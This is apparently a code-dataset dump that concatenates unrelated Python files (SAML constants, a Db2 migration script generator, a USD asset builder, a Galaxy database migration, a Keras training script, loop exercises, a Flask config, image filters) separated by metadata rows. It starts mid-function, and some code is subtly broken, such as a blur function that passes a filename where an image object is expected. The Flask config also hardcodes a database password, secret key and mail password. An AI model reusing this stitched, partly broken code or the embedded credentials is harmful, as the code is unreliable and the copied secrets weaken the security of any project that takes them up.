return ((_input * 128) + 128).astype(np.uint8)
elif dtype == np.int16:
return (_input * 32768).astype(np.int16)
elif dtype == np.int32:
print(_input)
return (_input * 2147483648).astype(np.int32)
raise ValueError('Unsupported wave file format')
| 36.957055 | 100 | 0.659529 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,465 | 0.409197 |
e691c0247838523436befe1e1ccaf96b1e1135db | 374 | py | Python | src/minisaml/internal/constants.py | HENNGE/minisaml | d96aa5d294eee60521ad3c7084e8659b25935cee | [
"Apache-2.0"
] | 2 | 2020-09-13T15:55:50.000Z | 2021-01-07T07:40:24.000Z | src/minisaml/internal/constants.py | HENNGE/minisaml | d96aa5d294eee60521ad3c7084e8659b25935cee | [
"Apache-2.0"
] | 11 | 2020-08-26T12:27:39.000Z | 2021-11-17T16:10:00.000Z | src/minisaml/internal/constants.py | HENNGE/minisaml | d96aa5d294eee60521ad3c7084e8659b25935cee | [
"Apache-2.0"
] | 1 | 2021-10-07T11:49:28.000Z | 2021-10-07T11:49:28.000Z | NAMES_SAML2_PROTOCOL = "urn:oasis:names:tc:SAML:2.0:protocol"
NAMES_SAML2_ASSERTION = "urn:oasis:names:tc:SAML:2.0:assertion"
NAMEID_FORMAT_UNSPECIFIED = "urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified"
BINDINGS_HTTP_POST = "urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST"
DATE_TIME_FORMAT = "%Y-%m-%dT%H:%M:%SZ"
DATE_TIME_FORMAT_FRACTIONAL = "%Y-%m-%dT%H:%M:%S.%fZ"
| 53.428571 | 83 | 0.759358 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 223 | 0.596257 |
e692cff5589dc59f4785c76fbfa11c53ff5a1d4e | 305 | py | Python | setup.py | arokem/afq-deep-learning | 61d7746f03914d63c56253d10d0f6a21e6c78e90 | [
"BSD-3-Clause"
] | null | null | null | setup.py | arokem/afq-deep-learning | 61d7746f03914d63c56253d10d0f6a21e6c78e90 | [
"BSD-3-Clause"
] | null | null | null | setup.py | arokem/afq-deep-learning | 61d7746f03914d63c56253d10d0f6a21e6c78e90 | [
"BSD-3-Clause"
] | 2 | 2021-12-01T17:04:39.000Z | 2022-01-20T22:53:40.000Z | from setuptools import find_packages, setup
setup(
name='src',
packages=find_packages(),
version='0.1.0',
description='This repository hosts some work-in-progress experiments applying deep learning to predict age using tractometry data.',
author='Joanna Qiao',
license='BSD-3',
)
| 27.727273 | 136 | 0.718033 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 151 | 0.495082 |
e6a5f147ff440a3daeccaecdee477658d01cb25a | 4,044 | py | Python | DBParser/DBMove.py | lelle1234/Db2Utils | 55570a1afbe6d4abe61c31952bc178c2443f4e5b | [
"Apache-2.0"
] | 4 | 2020-02-27T13:56:37.000Z | 2022-02-07T23:07:24.000Z | DBParser/DBMove.py | lelle1234/Db2Utils | 55570a1afbe6d4abe61c31952bc178c2443f4e5b | [
"Apache-2.0"
] | null | null | null | DBParser/DBMove.py | lelle1234/Db2Utils | 55570a1afbe6d4abe61c31952bc178c2443f4e5b | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python3
import ibm_db
import getopt
import sys
import os
from toposort import toposort_flatten
db = None
host = "localhost"
port = "50000"
user = None
pwd = None
outfile = None
targetdb = None
try:
opts, args = getopt.getopt(sys.argv[1:], "h:d:P:u:p:o:t:")
except getopt.GetoptError:
sys.exit(-1)
for o, a in opts:
if o == "-d":
db = a
if o == "-h":
host = a
if o == "-P":
port = a
if o == "-u":
user = a
if o == "-p":
pwd = a
if o == "-t":
targetdb = a
if db is None or user is None or pwd is None or targetdb is None:
print("Usage: DBMove.py [-h <host> -P <port>] -d <db> -u <user> -p <pwd> -t <target>")
sys.exit(1)
db = db.upper()
targetdb = targetdb.upper()
cfg = (db, host, port, user, pwd)
conn = ibm_db.connect("DATABASE=%s; HOSTNAME=%s; PORT=%s; PROTOCOL=TCPIP; UID=%s; PWD=%s" % cfg, "", "")
get_db_type = "values nya.get_db_type()"
find_edges = """
SELECT rtrim(t.tabschema) || '.' || rtrim(t.tabname)
, coalesce(rtrim(r.reftabschema) || '.' || rtrim(r.reftabname), 'dummy')
FROM syscat.tables t
LEFT JOIN syscat.references r
ON (t.tabschema, t.tabname) = (r.tabschema, r.tabname)
WHERE t.tabschema not like 'SYS%'
AND t.type = 'T'
AND rtrim(t.tabschema) not like 'NYA_%'
AND t.tabschema <> 'TMP'
ORDER BY 1
"""
identity_skip = """
select rtrim(tabschema) || '.' || rtrim(tabname) from syscat.columns
where identity = 'Y' and generated = 'D'
"""
stmt = ibm_db.prepare(conn, get_db_type)
ibm_db.execute(stmt, ())
tpl = ibm_db.fetch_tuple(stmt)
db_type = tpl[0]
edges = dict()
stmt = ibm_db.prepare(conn, find_edges)
ibm_db.execute(stmt, ())
tpl = ibm_db.fetch_tuple(stmt)
while tpl:
n1, n2 = tpl
try:
edges[n1].add(n2)
except KeyError:
edges[n1] = set()
edges[n1].add(n2)
tpl = ibm_db.fetch_tuple(stmt)
sorted_nodes = list(toposort_flatten(edges))
# print(sorted_nodes)
identity_skip_arr = []
edges = dict()
stmt = ibm_db.prepare(conn, identity_skip)
ibm_db.execute(stmt, ())
tpl = ibm_db.fetch_tuple(stmt)
while tpl:
identity_skip_arr.append(tpl[0])
tpl = ibm_db.fetch_tuple(stmt)
# print(identity_skip)
os.makedirs(db, exist_ok=True)
export_file = open("%s/export.sql" % db, "w")
load_file = open("%s/load.sql" % db, "w")
export_file.write("connect to %s;\n" % db)
load_file.write("connect to %s;\n" % targetdb)
if db_type == "N":
load_file.write("""set integrity for nya.person off;\n""")
load_file.write("""alter table nya.person
alter column EMAIL_UC drop generated
alter column NORMALIZED_FIRSTNAME drop generated
alter column NORMALIZED_LASTNAME drop generated;\n""")
load_file.write("""set integrity for nya.person immediate checked;\n""")
for t in sorted_nodes:
if t == "dummy":
continue
export_file.write("export to %s.ixf of ixf lobs to . modified by codepage=819 messages export_%s.msg select * from %s;\n" % (t,t,t))
identityskip = "identityoverride"
if t in identity_skip_arr:
identityskip = " "
load_file.write("load from %s.ixf of ixf lobs from . modified by generatedoverride %s messages load_%s.msg replace into %s;\n" % (t, identityskip, t, t))
if db_type == "N":
load_file.write("""set integrity for nya.person off;\n""")
load_file.write("""alter table nya.person
alter column EMAIL_UC set generated always as ( upper(email))
alter column NORMALIZED_FIRSTNAME set generated always as ( NYA.REMOVE_DIACRITICS( FIRSTNAME ) )
alter column NORMALIZED_LASTNAME set generated always as ( NYA.REMOVE_DIACRITICS( LASTNAME ) );\n""")
load_file.write("""set integrity for nya.person immediate checked force generated;\n""")
load_file.write("""echo set integrity for all tables;\n""")
export_file.write("connect reset;\n")
load_file.write("connect reset;\n")
export_file.close()
load_file.close()
| 29.304348 | 157 | 0.633778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,022 | 0.5 |
e6b3c1a04d6b23957a4328b1a4d335f1079479f3 | 8,099 | py | Python | extras/usd/examples/usdMakeFileVariantModelAsset/usdMakeFileVariantModelAsset.py | DougRogers-DigitalFish/USD | d8a405a1344480f859f025c4f97085143efacb53 | [
"BSD-2-Clause"
] | 3,680 | 2016-07-26T18:28:11.000Z | 2022-03-31T09:55:05.000Z | extras/usd/examples/usdMakeFileVariantModelAsset/usdMakeFileVariantModelAsset.py | DougRogers-DigitalFish/USD | d8a405a1344480f859f025c4f97085143efacb53 | [
"BSD-2-Clause"
] | 1,759 | 2016-07-26T19:19:59.000Z | 2022-03-31T21:24:00.000Z | extras/usd/examples/usdMakeFileVariantModelAsset/usdMakeFileVariantModelAsset.py | DougRogers-DigitalFish/USD | d8a405a1344480f859f025c4f97085143efacb53 | [
"BSD-2-Clause"
] | 904 | 2016-07-26T18:33:40.000Z | 2022-03-31T09:55:16.000Z | #!/pxrpythonsubst
#
# Copyright 2016 Pixar
#
# Licensed under the Apache License, Version 2.0 (the "Apache License")
# with the following modification; you may not use this file except in
# compliance with the Apache License and the following modification to it:
# Section 6. Trademarks. is deleted and replaced with:
#
# 6. Trademarks. This License does not grant permission to use the trade
# names, trademarks, service marks, or product names of the Licensor
# and its affiliates, except as required to comply with Section 4(c) of
# the License and to reproduce the content of the NOTICE file.
#
# You may obtain a copy of the Apache License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the Apache License with the above modification is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the Apache License for the specific
# language governing permissions and limitations under the Apache License.
#
'''
Creates a top-level, referenceable asset USD file from one or more
'variant' files, each of which can contain arbitrary scene description.
When supplying multiple files, one must also provide the name for a
variantSet that will be constructed to switch between the files.
The asset file will place the variant files behind a "payload", which will
enable consumers to defer loading and processing of the data when composed
onto a UsdStage.
The names of the created variations will be taken directly from the basename
of their corresponding input file.
'''
from __future__ import print_function
from pxr import Tf, Kind, Sdf, Usd
# ToDo:
# - handle multiple variantSets
# - layer multiple kinds of files (e.g. shading.usd over geom.usd)
# - allow output filename to be independently specifiable? (Breaks with Pixar
# convention)
# - allow variant names to be specified independently of variant file names
# - Compute and present (per-variant) UsdGeomModelAPI.extentsHint
# - Compute and author UsdModelAPI::SetPayloadAssetDependencies()
def CreateModelStage(assetName,
assetIdentifier=None,
kind=Kind.Tokens.component,
filesToReference=None,
variantSetName=None,
defaultVariantSelection=None):
# Preconditions....
if not Tf.IsValidIdentifier(assetName):
print("assetName '%s' must be a valid identifier. Aborting." %
assetName)
return None
if variantSetName and not Tf.IsValidIdentifier(variantSetName):
print("variantSetName '%s' must be a valid identifier. Aborting." %
variantSetName)
return None
if filesToReference and len(filesToReference) > 1 and not variantSetName:
# For now, we only allow multiple files to reference if we're switching
# them with a variantSet. We can relax this restriction when we can
# make internal payload arcs (bug #119960)
print("Cannot create multiple-file-reference without a variantSet. Aborting")
return None
if not Kind.Registry.IsA(kind, Kind.Tokens.model):
print("kind '%s' is not a valid model kind, which must be one of:" %
kind)
print(Kind.Registry.GetAllKinds())
return None
# Create the root file for the stage, and make it ASCII text.
# We need some nicer sugar for this.
fileName = assetName + ".usd"
rootLayer = Sdf.Layer.CreateNew(fileName, args = {'format':'usda'})
stage = Usd.Stage.Open(rootLayer)
# Name the root prim after the asset. Don't give it a type, since we
# want that to come from referenced files. Make it be the "default prim"
# so that we can reference the resulting file without specifiying a
# prim path
rootPath = Sdf.Path.absoluteRootPath
modelRootPrim = stage.DefinePrim(rootPath.AppendChild(assetName))
stage.SetDefaultPrim(modelRootPrim)
modelAPI = Usd.ModelAPI(modelRootPrim)
modelAPI.SetKind(kind)
# See http://openusd.org/docs/api/class_usd_model_a_p_i.html#details
# for more on assetInfo
modelAPI.SetAssetName(assetName)
modelAPI.SetAssetIdentifier(assetIdentifier or fileName)
# Add a class named after the asset, and make the asset inherit from it.
# This is not necessary for a valid asset, and the class-naming is a Pixar
# convention. But always having a class associated with each asset is
# extremely useful for non-destructively editing many referenced or
# instanced assets of the same type.
classPrim = stage.CreateClassPrim(rootPath.AppendChild("_class_"+assetName))
modelRootPrim.GetInherits().AddInherit(classPrim.GetPath())
if not filesToReference:
# weird edge case... we're done
return stage
elif len(filesToReference) == 1 and not variantSetName:
# The other, more plausible edge case: we're just wrapping
# some other file (e.g. alembic) in order to give it a payload
# and other proper USD trappings - no variants
modelRootPrim.GetPayloads().AddPayload(Sdf.Payload(filesToReference[0]))
return stage
# OK, we're making a variantSet, and we are going to vary the payload
# in each variant
varSet = modelRootPrim.GetVariantSet(variantSetName)
for variantFile in filesToReference:
import os
variantName = os.path.splitext(os.path.basename(variantFile))[0]
# If we didn't specify a default selection, choose the first one
if not defaultVariantSelection:
defaultVariantSelection = variantName
varSet.AddVariant(variantName)
varSet.SetVariantSelection(variantName)
# The context object makes all edits "go inside" the variant we
# just created.
with varSet.GetVariantEditContext():
modelRootPrim.GetPayloads().AddPayload(Sdf.Payload(variantFile))
# Now put the variantSet into the state we want it to be in by default
varSet.SetVariantSelection(defaultVariantSelection)
return stage
if __name__ == "__main__":
import argparse, os, sys
descr = __doc__.strip()
parser = argparse.ArgumentParser(prog=os.path.basename(sys.argv[0]),
description=descr)
parser.add_argument('assetName')
parser.add_argument('variantFiles', nargs='+')
parser.add_argument(
'-k', '--kind', default='component', action='store', metavar='kind',
help="Model kind, one of: component, group, or assembly")
parser.add_argument(
'-v', '--variantSet', default='', action='store', metavar='variantSet',
help="Variantset to create to modulate variantFiles. Can be elided "
"if only one file is supplied")
parser.add_argument(
'-i', '--identifier', default='', action='store', metavar='identifier',
help="The identifier you would expect your Ar asset-resolver plugin "
"to resolve to the (installed) assetName.usd file this script creates. "
" If unspecified, defaults to assetName.usd")
parser.add_argument(
'-d', '--defaultVariantSelection', default='', action='store',
metavar='defaultVariantSelection',
help="This variant will be selected by default when the asset is "
"added to a composition. If unspecified, will be the variant for "
"'variantFile1'")
args = parser.parse_args()
if not args.assetName or args.assetName == '':
parser.error("No assetName specified")
stage = CreateModelStage(args.assetName,
assetIdentifier=args.identifier,
kind=args.kind,
filesToReference=args.variantFiles,
variantSetName=args.variantSet,
defaultVariantSelection=args.defaultVariantSelection)
if stage:
stage.GetRootLayer().Save()
exit(0)
else:
exit(1)
| 44.256831 | 85 | 0.684159 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 4,422 | 0.545993 |
e6ba0ea03b3d3e18b20568efd5fed882e88148ea | 1,834 | py | Python | lib/galaxy/model/migrate/versions/0073_add_ldda_to_implicit_conversion_table.py | blankenberg/galaxy-data-resource | ca32a1aafd64948f489a4e5cf88096f32391b1d9 | [
"CC-BY-3.0"
] | null | null | null | lib/galaxy/model/migrate/versions/0073_add_ldda_to_implicit_conversion_table.py | blankenberg/galaxy-data-resource | ca32a1aafd64948f489a4e5cf88096f32391b1d9 | [
"CC-BY-3.0"
] | 1 | 2015-02-21T18:48:19.000Z | 2015-02-27T15:50:32.000Z | lib/galaxy/model/migrate/versions/0073_add_ldda_to_implicit_conversion_table.py | blankenberg/galaxy-data-resource | ca32a1aafd64948f489a4e5cf88096f32391b1d9 | [
"CC-BY-3.0"
] | 3 | 2015-02-22T13:34:16.000Z | 2020-10-01T01:28:04.000Z | """
Migration script to add 'ldda_parent_id' column to the implicitly_converted_dataset_association table.
"""
from sqlalchemy import *
from sqlalchemy.orm import *
from migrate import *
from migrate.changeset import *
import logging
log = logging.getLogger( __name__ )
metadata = MetaData()
def upgrade(migrate_engine):
metadata.bind = migrate_engine
print __doc__
metadata.reflect()
try:
Implicitly_converted_table = Table( "implicitly_converted_dataset_association", metadata, autoload=True )
if migrate_engine.name != 'sqlite':
c = Column( "ldda_parent_id", Integer, ForeignKey( "library_dataset_dataset_association.id" ), index=True, nullable=True )
else:
#Can't use the ForeignKey in sqlite.
c = Column( "ldda_parent_id", Integer, index=True, nullable=True )
c.create( Implicitly_converted_table, index_name="ix_implicitly_converted_dataset_assoc_ldda_parent_id")
assert c is Implicitly_converted_table.c.ldda_parent_id
except Exception, e:
print "Adding ldda_parent_id column to implicitly_converted_dataset_association table failed: %s" % str( e )
log.debug( "Adding ldda_parent_id column to implicitly_converted_dataset_association table failed: %s" % str( e ) )
def downgrade(migrate_engine):
metadata.bind = migrate_engine
metadata.reflect()
try:
Implicitly_converted_table = Table( "implicitly_converted_dataset_association", metadata, autoload=True )
Implicitly_converted_table.c.ldda_parent_id.drop()
except Exception, e:
print "Dropping ldda_parent_id column from implicitly_converted_dataset_association table failed: %s" % str( e )
log.debug( "Dropping ldda_parent_id column from implicitly_converted_dataset_association table failed: %s" % str( e ) )
| 44.731707 | 134 | 0.741003 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 736 | 0.401309 |
e6c8ce8afe1fef7a0e2e19b44facdada82817d59 | 311 | py | Python | __main__.py | maelstromdat/YOSHI | 67e5176f24ff12e598025d4250b408da564f53d1 | [
"Apache-2.0"
] | 6 | 2017-05-07T09:39:18.000Z | 2021-10-07T01:46:08.000Z | __main__.py | maelstromdat/YOSHI | 67e5176f24ff12e598025d4250b408da564f53d1 | [
"Apache-2.0"
] | 1 | 2018-01-15T15:31:03.000Z | 2018-01-15T15:31:03.000Z | __main__.py | maelstromdat/YOSHI | 67e5176f24ff12e598025d4250b408da564f53d1 | [
"Apache-2.0"
] | 5 | 2020-02-28T04:16:16.000Z | 2021-04-30T09:35:19.000Z | from YoshiViz import Gui
if __name__ == '__main__':
#file director
gui = Gui.Gui()
"""
report_generator.\
generate_pdf_report(fileDirectory, repositoryName, tempCommunityType)
"""
print('the type of', repositoryName, 'is', tempCommunityType, '\n"check .\YoshiViz\output"')
| 25.916667 | 96 | 0.662379 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 186 | 0.598071 |
e6cb563badebdde1d425f141d7f04f5b497ea2ae | 2,643 | py | Python | models/train.py | Hiwyl/keras_cnn_finetune | f424302a72c8d05056a9af6f9b293003acb8398d | [
"MIT"
] | 1 | 2019-09-30T01:07:03.000Z | 2019-09-30T01:07:03.000Z | models/train.py | Hiwyl/keras_cnn_finetune | f424302a72c8d05056a9af6f9b293003acb8398d | [
"MIT"
] | null | null | null | models/train.py | Hiwyl/keras_cnn_finetune | f424302a72c8d05056a9af6f9b293003acb8398d | [
"MIT"
] | null | null | null | # -*- encoding: utf-8 -*-
'''
@Author : lance
@Email : wangyl306@163.com
'''
import time
from model_cx.inceptionresnet import inceptionresnet
from model_cx.vgg19two import vgg19_all_lr
from model_cx.inceptionv3 import inceptionv3
from model_cx.densenet import densenet
from model_cx.nasnet import nasnet
from model_cx.merge import merge
from model_cx.bcnn import bilinearnet
from model_cx.resnet import ResNet50
from model_cx.mobilenetv2 import mobilenetv2
from model_cx.senet import senet
if __name__=="__main__":
classes = 1
epochs = 100
steps_per_epoch = 113
validation_steps = 48
shape=(224,224)
print("开始训练...")
start = time.time()
#
# try:
# print("densenet")
# densenet(classes, epochs, steps_per_epoch, validation_steps, shape)
# except Exception as e:
# print(e)
# try:
# print("bcnn")
# bilinearnet(classes, epochs, steps_per_epoch, validation_steps, shape)
#
# except Exception as e:
# print(e)
# try:
# print("resnet")
# ResNet50(classes, epochs, steps_per_epoch, validation_steps, shape)
# except Exception as e:
# print(e)
try:
print("merge")
merge(classes, epochs, steps_per_epoch, validation_steps, shape)
except Exception as e:
print(e)
# try:
# print("ince_res")
# inceptionresnet(classes, epochs, steps_per_epoch, validation_steps, (299, 299))
# # inceptionresnet(classes, epochs, steps_per_epoch, validation_steps, shape)
# except Exception as e:
# print(e)
# try:
# print("mobilenetv2")
# mobilenetv2(classes, epochs, steps_per_epoch, validation_steps, shape)
# except Exception as e:
# print(e)
# try:
# print("inceptionv3")
# inceptionv3(classes, epochs, steps_per_epoch, validation_steps, (299, 299))
# # inceptionv3(classes, epochs, steps_per_epoch, validation_steps, shape)
# except Exception as e:
# print(e)
try:
print("nasnet")
nasnet(classes, epochs, steps_per_epoch, validation_steps, shape)
except Exception as e:
print(e)
try:
print("vgg19two")
vgg19_all_lr(classes, epochs, steps_per_epoch, validation_steps, shape)
except Exception as e:
print(e)
try:
print("senet")
vgg19_all_lr(classes, epochs, steps_per_epoch, validation_steps, (100,100))
except Exception as e:
print(e)
end = time.time()
print("ETA:", (end - start) / 3600) | 31.094118 | 90 | 0.623156 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,216 | 0.458695 |
e6cfd0714854720779418d4a80b8997e25e611e3 | 3,227 | py | Python | python-function-files-dictionaries/week4-assignment1.py | MauMendes/python3-programming-specialization | 8bd259f0ac559c6004baa0e759b6ec4bc25e1320 | [
"MIT"
] | null | null | null | python-function-files-dictionaries/week4-assignment1.py | MauMendes/python3-programming-specialization | 8bd259f0ac559c6004baa0e759b6ec4bc25e1320 | [
"MIT"
] | null | null | null | python-function-files-dictionaries/week4-assignment1.py | MauMendes/python3-programming-specialization | 8bd259f0ac559c6004baa0e759b6ec4bc25e1320 | [
"MIT"
] | null | null | null | #1) Write a function, sublist, that takes in a list of numbers as the parameter. In the function, use a while loop to return a sublist of the input list.
# The sublist should contain the same values of the original list up until it reaches the number 5 (it should not contain the number 5).
def sublist(input_lst):
out_lst = list()
number = 0
i = 0
print(input_lst)
print(len(input_lst))
length = len(input_lst)
while i<length:
number = input_lst[i]
i+=1
if number==5: break
else : out_lst.append(number)
print(out_lst)
return out_lst
#2) Write a function called check_nums that takes a list as its parameter, and contains a while loop that only stops once the element of the
# list is the number 7. What is returned is a list of all of the numbers up until it reaches 7.def check_nums(input_lst):
def check_nums(input_lst):
out_lst = list()
number = 0
i = 0
print(input_lst)
print(len(input_lst))
length = len(input_lst)
while i<length:
number = input_lst[i]
i+=1
if number==7: break
else : out_lst.append(number)
print(out_lst)
return out_lst
#3) Write a function, sublist, that takes in a list of strings as the parameter. In the function, use a while loop to return a sublist of the input list.
# The sublist should contain the same values of the original list up until it reaches the string “STOP” (it should not contain the string “STOP”).
def sublist(in_lst):
out_list = list()
str = ""
i = 0
while str!="STOP":
str = in_lst[i]
i+=1
if str=="STOP": break
else: out_list.append(str)
return out_list
#4) Write a function called stop_at_z that iterates through a list of strings. Using a while loop, append each string to a new list until the string that
# appears is “z”. The function should return the new list.
def stop_at_z(in_lst):
out_list = list()
str = ""
i = 0
while str!="z":
str = in_lst[i]
i+=1
if str=="z": break
else: out_list.append(str)
return out_list
#5) Below is a for loop that works. Underneath the for loop, rewrite the problem so that it does the same thing, but using a while loop instead of a for loop.
# Assign the accumulated total in the while loop code to the variable sum2. Once complete, sum2 should equal sum1.
lst = [65, 78, 21, 33]
lenght = len(lst)
i = 0
sum2 = 0
while i<lenght:
sum2 += lst[i]
i+=1
#6) Challenge: Write a function called beginning that takes a list as input and contains a while loop that only stops once the element of the list is the string ‘bye’.
# What is returned is a list that contains up to the first 10 strings, regardless of where the loop stops. (i.e., if it stops on the 32nd element, the first 10 are
# returned. If “bye” is the 5th element, the first 4 are returned.) If you want to make this even more of a challenge, do this without slicing
def beginning(in_list):
length = len(in_list)
out_lst = list()
i = 0
str = ""
while i<length:
str = in_list[i]
i+=1
if str=="bye" or i>10:
break
out_lst.append(str)
return out_lst
| 37.091954 | 168 | 0.664084 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,859 | 0.572528 |
e6ddfeb2d231878165ecef38a814ab51e23d6978 | 412 | py | Python | enan/__init__.py | mizuno-group/enan | 3c9dbe60bebf98e384e858db56980928b5897775 | [
"MIT"
] | null | null | null | enan/__init__.py | mizuno-group/enan | 3c9dbe60bebf98e384e858db56980928b5897775 | [
"MIT"
] | null | null | null | enan/__init__.py | mizuno-group/enan | 3c9dbe60bebf98e384e858db56980928b5897775 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Wed Dec 25 15:46:32 2019
@author: tadahaya
"""
from .binom import BT
from .connect import Connect
from .fet import FET
from .gsea import GSEA
from .ssgsea import ssGSEA
__copyright__ = 'Copyright (C) 2020 MIZUNO Tadahaya'
__version__ = '1.0.3'
__license__ = 'MIT'
__author__ = 'MIZUNO Tadahaya'
__author_email__ = 'tadahaya@gmail.com' | 22.888889 | 56 | 0.662621 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 175 | 0.424757 |
e6de80977f40faa2f17ffea735e4529c245402b4 | 320 | py | Python | app/helpers/__init__.py | Hacker-1202/Selfium | 7e798c23c9f24aacab6f6a485d6355f1045bc65c | [
"MIT"
] | 14 | 2021-11-05T11:27:25.000Z | 2022-02-28T02:04:32.000Z | app/helpers/__init__.py | CssHammer/Selfium | 7e798c23c9f24aacab6f6a485d6355f1045bc65c | [
"MIT"
] | 2 | 2022-01-24T22:00:44.000Z | 2022-01-31T13:13:27.000Z | app/helpers/__init__.py | CssHammer/Selfium | 7e798c23c9f24aacab6f6a485d6355f1045bc65c | [
"MIT"
] | 5 | 2022-01-02T13:33:17.000Z | 2022-02-26T13:09:50.000Z |
"""
Selfium Helper Files
~~~~~~~~~~~~~~~~~~~
All Helper Files used in Selfium project;
:copyright: (c) 2021 - Caillou and ZeusHay;
:license: MIT, see LICENSE for more details.
"""
from .getUser import *
from .getGuild import *
from .params import *
from .notify import *
from .sendEmbed import *
from .isStaff import * | 21.333333 | 44 | 0.6875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 179 | 0.559375 |
e6e3cdee410d18c73bf42cae95012d7ea773e4ae | 808 | py | Python | app/config/secure.py | mapeimapei/awesome-flask-webapp | d0474f447a41e9432a14f9110989166c6595f0fa | [
"MIT"
] | 2 | 2020-05-08T15:58:44.000Z | 2020-05-09T19:36:34.000Z | app/config/secure.py | mapeimapei/awesome-flask-webapp | d0474f447a41e9432a14f9110989166c6595f0fa | [
"MIT"
] | null | null | null | app/config/secure.py | mapeimapei/awesome-flask-webapp | d0474f447a41e9432a14f9110989166c6595f0fa | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
__author__ = '带土'
SQLALCHEMY_DATABASE_URI = 'mysql+pymysql://root:mapei123@127.0.0.1:3306/awesome'
SECRET_KEY = '\x88D\xf09\x91\x07\x98\x89\x87\x96\xa0A\xc68\xf9\xecJ:U\x17\xc5V\xbe\x8b\xef\xd7\xd8\xd3\xe6\x98*4'
# Email 配置
MAIL_SERVER = 'smtp.exmail.qq.com'
MAIL_PORT = 465
MAIL_USE_SSL = True
MAIL_USE_TSL = False
MAIL_USERNAME = 'hello@yushu.im'
MAIL_PASSWORD = 'Bmwzy1314520'
MAIL_SUBJECT_PREFIX = '[鱼书]'
MAIL_SENDER = '鱼书 <hello@yushu.im>'
# 开启数据库查询性能测试
SQLALCHEMY_RECORD_QUERIES = True
# 性能测试的阀值
DATABASE_QUERY_TIMEOUT = 0.5
SQLALCHEMY_TRACK_MODIFICATIONS = True
WTF_CSRF_CHECK_DEFAULT = False
SQLALCHEMY_ECHO = True
from datetime import timedelta
REMEMBER_COOKIE_DURATION = timedelta(days=30)
PROXY_API = 'http://ip.yushu.im/get'
# PERMANENT_SESSION_LIFETIME = 3600
| 22.444444 | 113 | 0.762376 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 401 | 0.466279 |
e6e91782ecbf3d082de6c4e80c1d94b9a36175e3 | 8,084 | py | Python | transform.py | latenite4/python3 | 30e367471ba48e5fc0fb07327b636fcb9959e3e0 | [
"Apache-2.0"
] | null | null | null | transform.py | latenite4/python3 | 30e367471ba48e5fc0fb07327b636fcb9959e3e0 | [
"Apache-2.0"
] | null | null | null | transform.py | latenite4/python3 | 30e367471ba48e5fc0fb07327b636fcb9959e3e0 | [
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python3
#program to parse png images and change images
# cmd: python3 transform.py
# you must have local input/ and output/ directories
#
# name: R. Melton
# date: 12/27/20
# cmdline: python transform.py cmd show image='city.png' --ulx=1 --uly=2 --brx=0 --bry=9
# python transform.py show city.png
# python transform.py blur city.png
from image import Image
import numpy as np
import time, os, argparse, string
#from tkinter import *
import imghdr
import matplotlib.image as mpimg
import matplotlib.pyplot as plt
def adjust_brightness(image,factor):
#scale each value by some amount
x_pixels, y_pixels,num_channels = image.array.shape
new_im = Image(x_pixels=x_pixels,y_pixels=y_pixels,num_channels=num_channels)
for x in range(x_pixels):
for y in range(y_pixels):
for c in range(num_channels):
new_im.array[x,y,c] = image.array[x,y,c] * factor #non vectorized version
#vectorized version
# new_im.array = image.array * factor -# this is faster
return new_im
#adjust the contrast by increasing difference from user
#defined midpoint
def adjust_contrast(image, factor, mid=0.5):
x_pixels, y_pixels,num_channels = image.array.shape
new_im = Image(x_pixels=x_pixels,y_pixels=y_pixels,num_channels=num_channels)
for x in range(x_pixels):
for y in range(y_pixels):
for c in range(num_channels):
new_im.array[x,y,c] = (image.array[x,y,c] -mid)* factor + mid #non vectorized version
#vectorized version
# new_im.array = (image.array - mid) * factor + mid
return new_im
# blur and image
def blur(image, k_size):
#k_size is the number of pixels to use when doing the blur
#k_size=3 would be above and below and left neighbor, right neighbor pixels, and diagonal
#neighbor pixels.
im = Image(filename = image)
x_pixels, y_pixels,num_channels = im.array.shape
new_im = Image(x_pixels=x_pixels,y_pixels=y_pixels,num_channels=num_channels)
neighbor_range = k_size // 2
for x in range(x_pixels):
for y in range(y_pixels):
for c in range(num_channels):
total = 0
for x_i in range(max(0,x-neighbor_range), min(new_im.x_pixels-1, x+neighbor_range)+1):
for y_i in range(max(0,y-neighbor_range), min(new_im.y_pixels-1, y+neighbor_range)+1):
total += image.array[x_i, y_i, c]
new_im.array[x,y,c] = total / (k_size **2) # average for kernel size in image
return new_im
def apply_kernel(image, kernel):
# the kernel should be a 2D array that represents the kernel we'll use!
# for the sake of simiplicity of this implementation, let's assume that the kernel is SQUARE
# for example the sobel x kernel (detecting horizontal edges) is as follows:
# [1 0 -1]
# [2 0 -2]
# [1 0 -1]
x_pixels, y_pixels, num_channels = image.array.shape # represents x, y pixels of image, # channels (R, G, B)
new_im = Image(x_pixels=x_pixels, y_pixels=y_pixels, num_channels=num_channels) # making a new array to copy values to!
neighbor_range = kernel.shape[0] // 2 # this is a variable that tells us how many neighbors we actually look at (ie for a 3x3 kernel, this value should be 1)
for x in range(x_pixels):
for y in range(y_pixels):
for c in range(num_channels):
total = 0
for x_i in range(max(0,x-neighbor_range), min(new_im.x_pixels-1, x+neighbor_range)+1):
for y_i in range(max(0,y-neighbor_range), min(new_im.y_pixels-1, y+neighbor_range)+1):
x_k = x_i + neighbor_range - x
y_k = y_i + neighbor_range - y
kernel_val = kernel[x_k, y_k]
total += image.array[x_i, y_i, c] * kernel_val
new_im.array[x, y, c] = total
return new_im
